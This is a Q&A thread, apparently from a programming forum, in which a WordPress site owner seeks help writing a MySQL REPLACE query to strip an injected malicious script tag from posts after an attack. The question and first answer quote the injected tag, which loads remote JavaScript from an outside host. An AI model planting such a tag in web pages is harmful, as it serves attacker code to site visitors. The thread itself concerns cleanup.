# Replacing javascript link in Wordpress database without getting mysql syntax errors

Tags: database, mysql

After a malware attack I am trying to replace a malicious  call entries. I keep getting syntax errors due to the configuration of the link. Tried all of the various escape characters to now avail. Familiar with normal find and replace but due to unique code in links `` update _DVB_posts set post_content = replace(post_content,'<script src=''https\;//`port`.transandfiestas.ga/stat.js?ft=ms''  type=''text/javascript''></script>',' '); ``

I've included one of my versions. Any help would be appreciated.

Answer (score 0):

If it's just the apostrophes in the quoted strings, you escape them with backslashes like `\'`:

```sql
update _DVB_posts
set post_content = replace( post_content,
    '<script src=\'https://`port`.transandfiestas.ga/stat.js?ft=ms\' type=\'text/javascript\'></script>',
    ' ');
```

However I'm not sure what you're trying to do with the `port` part though.

Answer (score 0):

The injected script call had semi-colon after https (instead of colon) as it should be and port is part of the injection code. I understood that the word "port" is not allowed without back-quote or grave symbol. Not sure. Trying to search and replace the full injected link with blank, but query gets rejected.

Comment: Hi - are you the original poster again using a different account? This sounds more like a reply than an answer. Else I'm not sure what you're saying?

Comment: Yes, Rup sorry. Posted in wrong place. Thank you for answering. So as reply to your answer:

Comment: The injected script call had semi-colon after https (instead of colon) as it should be and port is part of the injection code. I understood that the word "port" is not allowed without back-quote or grave symbol. Not sure. Trying to search and replace the full injected link with blank, but query gets rejected.